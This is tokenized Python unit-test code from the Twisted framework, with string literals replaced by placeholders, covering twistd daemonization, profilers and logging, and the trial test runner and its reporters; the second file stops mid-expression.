TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_daemonizationHooksCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeDaemonizingReactor ( ) <EOL> os = MockOS ( ) <EOL> _twistd_unix . daemonize ( reactor , os ) <EOL> self . assertTrue ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertTrue ( reactor . _afterDaemonizeCalled ) <EOL> def test_daemonizationHooksNotCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeNonDaemonizingReactor ( ) <EOL> os = MockOS ( ) <EOL> _twistd_unix . daemonize ( reactor , os ) <EOL> self . assertFalse ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertFalse ( reactor . _afterDaemonizeCalled ) <EOL> class DummyReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> called = False <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . called : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . called = True <EOL> class AppProfilingTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_profile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . 
ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> data = file ( config [ "<STR_LIT>" ] ) . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if profile is None : <EOL> test_profile . skip = "<STR_LIT>" <EOL> def _testStats ( self , statsClass , profile ) : <EOL> out = StringIO . StringIO ( ) <EOL> stdout = self . patch ( sys , '<STR_LIT>' , out ) <EOL> stats = statsClass ( profile ) <EOL> stats . print_stats ( ) <EOL> stdout . restore ( ) <EOL> data = out . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> def test_profileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if profile is None : <EOL> test_profileSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_profilePrintStatsError ( self ) : <EOL> """<STR_LIT>""" <EOL> class ErroneousProfile ( profile . 
Profile ) : <EOL> def print_stats ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . patch ( profile , "<STR_LIT>" , ErroneousProfile ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> oldStdout = sys . stdout <EOL> self . assertRaises ( RuntimeError , profiler . run , reactor ) <EOL> self . assertIdentical ( sys . stdout , oldStdout ) <EOL> if profile is None : <EOL> test_profilePrintStatsError . skip = "<STR_LIT>" <EOL> def test_hotshot ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> data = file ( config [ "<STR_LIT>" ] ) . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if hotshot is None : <EOL> test_hotshot . skip = "<STR_LIT>" <EOL> def test_hotshotSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( hotshot . stats . load , config [ '<STR_LIT>' ] ) <EOL> if hotshot is None : <EOL> test_hotshotSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutHotshot ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . 
AppProfiler ( config ) <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_hotshotPrintStatsError ( self ) : <EOL> """<STR_LIT>""" <EOL> class ErroneousStats ( pstats . Stats ) : <EOL> def print_stats ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . patch ( pstats , "<STR_LIT>" , ErroneousStats ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> oldStdout = sys . stdout <EOL> self . assertRaises ( RuntimeError , profiler . run , reactor ) <EOL> self . assertIdentical ( sys . stdout , oldStdout ) <EOL> if hotshot is None : <EOL> test_hotshotPrintStatsError . skip = "<STR_LIT>" <EOL> def test_cProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> data = file ( config [ "<STR_LIT>" ] ) . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if cProfile is None : <EOL> test_cProfile . skip = "<STR_LIT>" <EOL> def test_cProfileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if cProfile is None : <EOL> test_cProfileSaveStats . 
skip = "<STR_LIT>" <EOL> def test_withoutCProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_unknownProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> error = self . assertRaises ( SystemExit , app . AppProfiler , config ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_defaultProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def test_profilerNameCaseInsentive ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def _patchFileLogObserver ( patch ) : <EOL> """<STR_LIT>""" <EOL> logFiles = [ ] <EOL> oldFileLobObserver = log . FileLogObserver <EOL> def FileLogObserver ( logFile ) : <EOL> logFiles . append ( logFile ) <EOL> return oldFileLobObserver ( logFile ) <EOL> patch ( log , '<STR_LIT>' , FileLogObserver ) <EOL> return logFiles <EOL> def _setupSyslog ( testCase ) : <EOL> """<STR_LIT>""" <EOL> logMessages = [ ] <EOL> class fakesyslogobserver ( object ) : <EOL> def __init__ ( self , prefix ) : <EOL> logMessages . append ( prefix ) <EOL> def emit ( self , eventDict ) : <EOL> logMessages . append ( eventDict ) <EOL> testCase . patch ( syslog , "<STR_LIT>" , fakesyslogobserver ) <EOL> return logMessages <EOL> class AppLoggerTestCase ( unittest . 
TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . observers = [ ] <EOL> def startLoggingWithObserver ( observer ) : <EOL> self . observers . append ( observer ) <EOL> log . addObserver ( observer ) <EOL> self . patch ( log , '<STR_LIT>' , startLoggingWithObserver ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> for observer in self . observers : <EOL> log . removeObserver ( observer ) <EOL> def _checkObserver ( self , logs ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . observers , [ logs . append ] ) <EOL> self . assertIn ( "<STR_LIT>" , logs [ <NUM_LIT:0> ] [ "<STR_LIT:message>" ] [ <NUM_LIT:0> ] ) <EOL> self . assertIn ( "<STR_LIT>" , logs [ <NUM_LIT:1> ] [ "<STR_LIT:message>" ] [ <NUM_LIT:0> ] ) <EOL> def test_start ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { } ) <EOL> observer = [ ] <EOL> logger . _getLogObserver = lambda : observer . append <EOL> logger . start ( Componentized ( ) ) <EOL> self . _checkObserver ( observer ) <EOL> def test_startUsesApplicationLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> logs = [ ] <EOL> application . setComponent ( ILogObserver , logs . append ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . start ( application ) <EOL> self . _checkObserver ( logs ) <EOL> def _setupConfiguredLogger ( self , application , extraLogArgs = { } , <EOL> appLogger = app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> logs = [ ] <EOL> logArgs = { "<STR_LIT>" : lambda : logs . append } <EOL> logArgs . update ( extraLogArgs ) <EOL> logger = appLogger ( logArgs ) <EOL> logger . start ( application ) <EOL> return logs <EOL> def test_startUsesConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . 
_setupConfiguredLogger ( application ) ) <EOL> def test_configuredLogObserverBeatsComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> nonlogs = [ ] <EOL> application = Componentized ( ) <EOL> application . setComponent ( ILogObserver , nonlogs . append ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> self . assertEqual ( nonlogs , [ ] ) <EOL> def test_configuredLogObserverBeatsSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : True } , <EOL> UnixAppLogger ) ) <EOL> self . assertEqual ( logs , [ ] ) <EOL> if _twistd_unix is None or syslog is None : <EOL> test_configuredLogObserverBeatsSyslog . skip = "<STR_LIT>" <EOL> def test_configuredLogObserverBeatsLogfile ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> path = self . mktemp ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : "<STR_LIT:path>" } ) ) <EOL> self . assertFalse ( os . path . exists ( path ) ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT:->" } ) <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . stdout ) <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> filename = self . mktemp ( ) <EOL> logger = app . 
AppLogger ( { "<STR_LIT>" : filename } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( filename ) ) <EOL> def test_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> removed = [ ] <EOL> observer = object ( ) <EOL> def remove ( observer ) : <EOL> removed . append ( observer ) <EOL> self . patch ( log , '<STR_LIT>' , remove ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . _observer = observer <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> self . assertIdentical ( logger . _observer , None ) <EOL> class UnixAppLoggerTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . signals = [ ] <EOL> def fakeSignal ( sig , f ) : <EOL> self . signals . append ( ( sig , f ) ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeSignal ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : True } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . stdout ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : True } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverStdoutDaemon ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : False } ) <EOL> error = self . assertRaises ( SystemExit , logger . 
_getLogObserver ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> filename = self . mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( filename ) ) <EOL> self . assertEqual ( len ( self . signals ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , signal . SIGUSR1 ) <EOL> d = Deferred ( ) <EOL> def rotate ( ) : <EOL> d . callback ( None ) <EOL> logFiles [ <NUM_LIT:0> ] . rotate = rotate <EOL> rotateLog = self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> rotateLog ( None , None ) <EOL> return d <EOL> def test_getLogObserverDontOverrideSignalHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> def fakeGetSignal ( sig ) : <EOL> self . assertEqual ( sig , signal . SIGUSR1 ) <EOL> return object ( ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeGetSignal ) <EOL> filename = self . mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( self . signals , [ ] ) <EOL> def test_getLogObserverDefaultFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : False } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( "<STR_LIT>" ) ) <EOL> def test_getLogObserverSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : True , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> observer = logger . 
_getLogObserver ( ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" ] ) <EOL> observer ( { "<STR_LIT:a>" : "<STR_LIT:b>" } ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" , { "<STR_LIT:a>" : "<STR_LIT:b>" } ] ) <EOL> if syslog is None : <EOL> test_getLogObserverSyslog . skip = "<STR_LIT>" </s>
<s> import StringIO , os , sys <EOL> from zope . interface import implements <EOL> from zope . interface . verify import verifyObject <EOL> from twisted . trial . itrial import IReporter , ITestCase <EOL> from twisted . trial import unittest , runner , reporter , util <EOL> from twisted . python import failure , log , reflect , filepath <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . scripts import trial <EOL> from twisted . plugins import twisted_trial <EOL> from twisted import plugin <EOL> from twisted . internet import defer <EOL> pyunit = __import__ ( '<STR_LIT>' ) <EOL> class CapturingDebugger ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _calls = [ ] <EOL> def runcall ( self , * args , ** kwargs ) : <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> args [ <NUM_LIT:0> ] ( * args [ <NUM_LIT:1> : ] , ** kwargs ) <EOL> class CapturingReporter ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IReporter ) <EOL> stream = None <EOL> tbformat = None <EOL> args = None <EOL> separator = None <EOL> testsRun = None <EOL> def __init__ ( self , stream = None , tbformat = None , rterrors = None , <EOL> publisher = None ) : <EOL> """<STR_LIT>""" <EOL> self . _calls = [ ] <EOL> self . shouldStop = False <EOL> self . _stream = stream <EOL> self . _tbformat = tbformat <EOL> self . _rterrors = rterrors <EOL> self . _publisher = publisher <EOL> def startTest ( self , method ) : <EOL> """<STR_LIT>""" <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def stopTest ( self , method ) : <EOL> """<STR_LIT>""" <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def cleanupErrors ( self , errs ) : <EOL> """<STR_LIT>""" <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def addSuccess ( self , test ) : <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def done ( self ) : <EOL> """<STR_LIT>""" <EOL> class TrialRunnerTestsMixin : <EOL> """<STR_LIT>""" <EOL> def tearDown ( self ) : <EOL> self . runner . 
_tearDownLogFile ( ) <EOL> def test_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> def _getObservers ( self ) : <EOL> return log . theLogPublisher . observers <EOL> def test_addObservers ( self ) : <EOL> """<STR_LIT>""" <EOL> originalCount = len ( self . _getObservers ( ) ) <EOL> self . runner . run ( self . test ) <EOL> newCount = len ( self . _getObservers ( ) ) <EOL> self . assertEqual ( newCount , originalCount ) <EOL> def test_logFileAlwaysActive ( self ) : <EOL> """<STR_LIT>""" <EOL> oldSetUpLogFile = self . runner . _setUpLogFile <EOL> l = [ ] <EOL> def setUpLogFile ( ) : <EOL> oldSetUpLogFile ( ) <EOL> l . append ( self . runner . _logFileObserver ) <EOL> self . runner . _setUpLogFile = setUpLogFile <EOL> self . runner . run ( self . test ) <EOL> self . runner . run ( self . test ) <EOL> self . assertEqual ( len ( l ) , <NUM_LIT:2> ) <EOL> self . failIf ( l [ <NUM_LIT:0> ] is l [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> def test_logFileGetsClosed ( self ) : <EOL> """<STR_LIT>""" <EOL> oldSetUpLogFile = self . runner . _setUpLogFile <EOL> l = [ ] <EOL> def setUpLogFile ( ) : <EOL> oldSetUpLogFile ( ) <EOL> l . append ( self . runner . _logFileObject ) <EOL> self . runner . _setUpLogFile = setUpLogFile <EOL> self . runner . run ( self . test ) <EOL> self . assertEqual ( len ( l ) , <NUM_LIT:1> ) <EOL> self . failUnless ( l [ <NUM_LIT:0> ] . closed ) <EOL> class TestTrialRunner ( TrialRunnerTestsMixin , unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( CapturingReporter , stream = self . stream ) <EOL> self . test = TestTrialRunner ( '<STR_LIT>' ) <EOL> def test_publisher ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . _makeResult ( ) <EOL> self . assertIdentical ( result . _publisher , log ) <EOL> class TrialRunnerWithUncleanWarningsReporter ( TrialRunnerTestsMixin , <EOL> unittest . 
TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( CapturingReporter , stream = self . stream , <EOL> uncleanWarnings = True ) <EOL> self . test = TestTrialRunner ( '<STR_LIT>' ) <EOL> class DryRunMixin ( object ) : <EOL> suppress = [ util . suppress ( <EOL> category = DeprecationWarning , <EOL> message = "<STR_LIT>" ) ] <EOL> def setUp ( self ) : <EOL> self . log = [ ] <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( CapturingReporter , <EOL> runner . TrialRunner . DRY_RUN , <EOL> stream = self . stream ) <EOL> self . makeTestFixtures ( ) <EOL> def makeTestFixtures ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . run ( runner . TestSuite ( ) ) <EOL> self . assertEqual ( result . _calls , [ ] ) <EOL> def test_singleCaseReporting ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . run ( self . test ) <EOL> self . assertEqual ( result . _calls , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_testsNotRun ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . run ( self . test ) <EOL> self . assertEqual ( self . log , [ ] ) <EOL> class DryRunTest ( DryRunMixin , unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def makeTestFixtures ( self ) : <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo ( test ) : <EOL> self . log . append ( '<STR_LIT>' ) <EOL> self . test = MockTest ( '<STR_LIT>' ) <EOL> self . suite = runner . TestSuite ( ) <EOL> class PyUnitDryRunTest ( DryRunMixin , unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def makeTestFixtures ( self ) : <EOL> class PyunitCase ( pyunit . TestCase ) : <EOL> def test_foo ( self ) : <EOL> pass <EOL> self . test = PyunitCase ( '<STR_LIT>' ) <EOL> self . suite = pyunit . TestSuite ( ) <EOL> class TestRunner ( unittest . 
TestCase ) : <EOL> def setUp ( self ) : <EOL> self . config = trial . Options ( ) <EOL> parts = reflect . qual ( CapturingReporter ) . split ( '<STR_LIT:.>' ) <EOL> package = '<STR_LIT:.>' . join ( parts [ : - <NUM_LIT:1> ] ) <EOL> klass = parts [ - <NUM_LIT:1> ] <EOL> plugins = [ twisted_trial . _Reporter ( <EOL> "<STR_LIT>" , <EOL> package , <EOL> description = "<STR_LIT>" , <EOL> longOpt = "<STR_LIT>" , <EOL> shortOpt = None , <EOL> klass = klass ) ] <EOL> def getPlugins ( iface , * a , ** kw ) : <EOL> self . assertEqual ( iface , IReporter ) <EOL> return plugins + list ( self . original ( iface , * a , ** kw ) ) <EOL> self . original = plugin . getPlugins <EOL> plugin . getPlugins = getPlugins <EOL> self . standardReport = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def tearDown ( self ) : <EOL> plugin . getPlugins = self . original <EOL> def parseOptions ( self , args ) : <EOL> self . config . parseOptions ( args ) <EOL> def getRunner ( self ) : <EOL> r = trial . _makeRunner ( self . config ) <EOL> r . stream = StringIO . StringIO ( ) <EOL> self . addCleanup ( r . _tearDownLogFile ) <EOL> r . _log = log . LogPublisher ( ) <EOL> return r <EOL> def test_runner_can_get_reporter ( self ) : <EOL> self . parseOptions ( [ ] ) <EOL> result = self . config [ '<STR_LIT>' ] <EOL> runner = self . getRunner ( ) <EOL> self . assertEqual ( result , runner . _makeResult ( ) . __class__ ) <EOL> def test_runner_get_result ( self ) : <EOL> self . parseOptions ( [ ] ) <EOL> runner = self . getRunner ( ) <EOL> result = runner . 
_makeResult ( ) <EOL> self . assertEqual ( result . __class__ , self . config [ '<STR_LIT>' ] ) <EOL> def test_uncleanWarningsOffByDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ ] ) <EOL> runner = self . getRunner ( ) <EOL> self . assertNotIsInstance ( runner . _makeResult ( ) , <EOL> reporter . UncleanWarningsReporterWrapper ) <EOL> def test_getsUncleanWarnings ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ '<STR_LIT>' ] ) <EOL> runner = self . getRunner ( ) <EOL> self . assertIsInstance ( runner . _makeResult ( ) , <EOL> reporter . UncleanWarningsReporterWrapper ) <EOL> def test_runner_working_directory ( self ) : <EOL> self . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> runner = self . getRunner ( ) <EOL> self . assertEqual ( runner . workingDirectory , '<STR_LIT>' ) <EOL> def test_concurrentImplicitWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ ] ) <EOL> self . addCleanup ( os . chdir , os . getcwd ( ) ) <EOL> runDirectory = FilePath ( self . mktemp ( ) ) <EOL> runDirectory . makedirs ( ) <EOL> os . chdir ( runDirectory . path ) <EOL> firstRunner = self . getRunner ( ) <EOL> secondRunner = self . getRunner ( ) <EOL> where = { } <EOL> class ConcurrentCase ( unittest . TestCase ) : <EOL> def test_first ( self ) : <EOL> """<STR_LIT>""" <EOL> where [ '<STR_LIT>' ] = subsequentDirectory = os . getcwd ( ) <EOL> os . chdir ( runDirectory . path ) <EOL> self . addCleanup ( os . chdir , subsequentDirectory ) <EOL> secondRunner . run ( ConcurrentCase ( '<STR_LIT>' ) ) <EOL> def test_second ( self ) : <EOL> """<STR_LIT>""" <EOL> where [ '<STR_LIT>' ] = os . getcwd ( ) <EOL> result = firstRunner . run ( ConcurrentCase ( '<STR_LIT>' ) ) <EOL> bad = result . errors + result . failures <EOL> if bad : <EOL> self . fail ( bad [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( <EOL> where , { <EOL> '<STR_LIT>' : runDirectory . child ( '<STR_LIT>' ) . 
